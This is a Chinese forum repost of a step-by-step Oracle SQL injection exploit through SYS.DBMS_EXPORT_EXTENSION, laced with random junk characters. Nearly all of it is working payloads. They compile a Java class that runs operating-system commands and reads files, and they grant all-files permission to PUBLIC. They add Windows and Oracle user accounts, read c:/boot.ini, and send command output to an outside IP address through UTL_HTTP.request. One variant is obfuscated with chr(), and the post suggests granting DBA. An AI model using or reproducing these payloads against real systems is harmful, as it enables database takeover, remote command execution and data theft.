以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 * Q# L7 y8 o8 [5 Y, \
0 A! E, R$ a0 }& O4 |! h
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
1 `+ x; y# L; |+ C的形式即可。(用" 'a'|| "是为了让语句返回true值)
2 h8 H. i/ Y$ ^7 r4 G语句有点长,可能要用post提交。 ( {8 @8 q3 e% K% ~- Y/ h4 P0 {
以下是各个步骤:
; x8 k N) o e( Q1.创建包 " \, \1 O f. a
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/ H: ]2 @$ a, N2 I8 A, m/ A9 H" O/xxx.jsp?id=1 and '1'<>'a'||(
4 C: N. m" A$ u& T$ tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; f3 _' ?% m+ j8 s2 J4 ?
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
9 q: O8 E/ W2 Q7 bnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}/ Q: P# V n- k' `9 w
}'''';END;'';END;--','SYS',0,'1',0) from dual ' x/ c! e/ d( U2 r* X
) " W& I& l, I( J: q5 x9 h
------------------------ - l0 O: j+ W& J) A2 c5 o8 A
如果url有长度限制,可以把readFile()函数块去掉,即: 2 n1 e; u! c5 y- `/ B2 A
/xxx.jsp?id=1 and '1'<>'a'||( , |6 C' b! y( N6 c, z+ @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' W1 g, B0 v: Y/ z& `, Q7 `3 b7 Acreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
; A) l) d+ x0 xnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}% L3 V4 v4 y3 B; [$ }5 x3 e
}'''';END;'';END;--','SYS',0,'1',0) from dual 6 }( i( X( e4 T! n
)
& x* j- F% b. ? [) l2 V4 ^同时把后面步骤 提到的 对readFile()的处理语句去掉。 $ I2 [) V' i, r6 p. X5 {
------------------------------ , ~9 t& J* \, l/ r# N: b0 u
2.赋Java权限
2 ]; ~$ W+ \3 B) q# y$ Nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual! w/ T. n2 Q$ O* c
3.创建函数 % ?0 z( j! N& a; o$ ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' l; D: {5 S$ a' D6 t: I$ A |+ K! Kcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual: K5 t1 x# K, q _+ `/ |/ k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ P) W; F6 |2 y! A8 Z4 O( Y
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
$ i0 I+ t! R0 Z5 u, T4.赋public执行函数的权限
$ W2 U2 C4 f. r. N' Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual3 }+ v0 g! K8 k# H5 F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
4 h& Y( B( U( |; G) {5 I5.测试上面的几步是否成功 0 I0 K2 s F7 s) I J( U
and '1'<>'11'||(
$ H$ l/ s' L+ L. eselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
$ s9 u& ~! R7 b2 ^% H4 R)
$ h! ~! U% r3 [6 w9 Dand '1'<>(
# r* `# m5 N% e2 {* C* x& z7 Rselect OBJECT_ID from all_objects where object_name ='LINXREADFILE'
) G6 V$ o$ W9 F)
3 W; K5 F* `+ b/ F6.执行命令:
& R0 s' q% z: O/xxx.jsp?id=1 and '1'<>( 6 R z) _6 o$ i, m# b
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
! |% x7 u$ J5 n. o9 A8 M% j) {# f! G* I, y2 e T. Y$ i8 w
)
/ P" s3 v4 @* e5 P5 r0 {/xxx.jsp?id=1 and '1'<>( G, K4 n! B9 i$ x
select sys.LinxReadFile('c:/boot.ini') from dual
3 R6 L; [8 F5 ?
. o9 G3 Z' \! k P) r)
2 ~6 X+ v: Z/ Q ) e$ t& O) y3 k% Q9 l7 d9 D
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 9 F3 l+ @" ~5 X0 Z: _6 `7 q% {
如果要查看运行结果可以用 union : 8 w0 S: v: ^9 S% Q3 r% l5 M0 e
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual9 I5 `1 u3 Z4 _1 N2 o
或者UTL_HTTP.request(: . L6 q% G9 C4 V' ?
/xxx.jsp?id=1 and '1'<>( 5 i2 I' G+ L/ x/ O n }
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual: g) F' n, a+ q! T9 v' A0 u
)
& I2 T! Q3 \% C( S# a3 f. V/xxx.jsp?id=1 and '1'<>( 1 {, F2 L7 z+ r% k' L5 k5 d0 D
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual, v* x+ a; @& X& I, f6 \) X
)
, \6 f6 ]; `& Y L. Q) l注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。" _* R& |7 |" h! X- U) l" ?6 q. h
--------------------
+ ^# z& \) P$ ?+ U6.内部变化 # t6 z( W# n' G) {6 o
通过以下命令可以查看all_objects表达改变: 7 f; d4 l2 d! v% e8 V0 V
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'6 G# z8 Z( v( d( ~0 u7 A' @3 Y8 v% ~9 Y
7.删除我们创建的函数 : p6 f+ Z; e, x" R. z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; H3 _4 ^1 U: l
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual 7 Y; {/ Z; R0 u5 M* p
====================================================
7 v7 O7 Y" d# t# N* i7 w$ Q全文结束。谨以此文赠与我的朋友。
5 W: F3 x" H+ Y7 g0 [linx / B0 R7 w* |3 z" o4 m1 G
124829445 0 M, o" E/ a3 M& S E
2008.1.12 8 U- B, v0 a6 P9 |9 K) c
linyujian@bjfu.edu.cn 4 ~/ _. t5 `( o. o. @
======================================================================
# U8 Z9 R" q3 F( B测试漏洞的另一方法: ( h/ J# y& D. E3 U- b* S$ o9 N
创建oracle帐号:
# }( H# A; X" ?: r; d4 v, kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 p0 l: _ g. |4 n _
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual; ^0 x) Z9 {' [
即:
) V# V+ [& E4 I2 Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),& O" {, L& V$ D8 v
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
9 W; ]5 |5 C3 d! b# m确定漏洞存在: % S9 n7 N9 w' k. v" y; t
1<>(
& A. z, t( M$ Z0 }8 f4 o# x. |select user_id from all_users where username='LINXSQL' 2 G; c: ^2 y8 e- }0 |9 B! |% `
) % O4 k* C4 T. ^2 f# Q
给linxsql连接权限:
- o) i% [, x9 T5 mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ s! J" v7 I1 t5 r. e; ~- F( g
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
( `2 q( V$ Q I: U; G( ? m: `& `删除帐号:
0 P/ _& X5 t4 f0 T; }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''6 @6 S* Q6 g/ n4 [$ c
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual # ?: O1 ~2 X4 w/ N
====================== ]3 [- X/ ? z. o
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:* _2 {" m5 u8 c" z
1.jsp?id=1 and '1'<>( " k- k1 h( \# r/ @- t3 w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') |! j0 b0 [; j8 c/ B/ D
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual) D+ Z# H& q+ `' f6 d$ O! Y
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE- L$ [9 X- ~$ V
)
; y. ~. {8 X9 O3 R7 S' G/ {! y" d# I* T* v; I& _ E
: ?8 ^# ?- H) t, S4 R' M
) c3 i) o9 u0 v3 \& c$ |. L+ x |
发表于 2012-12-18 12:21:48
收藏
支持
反对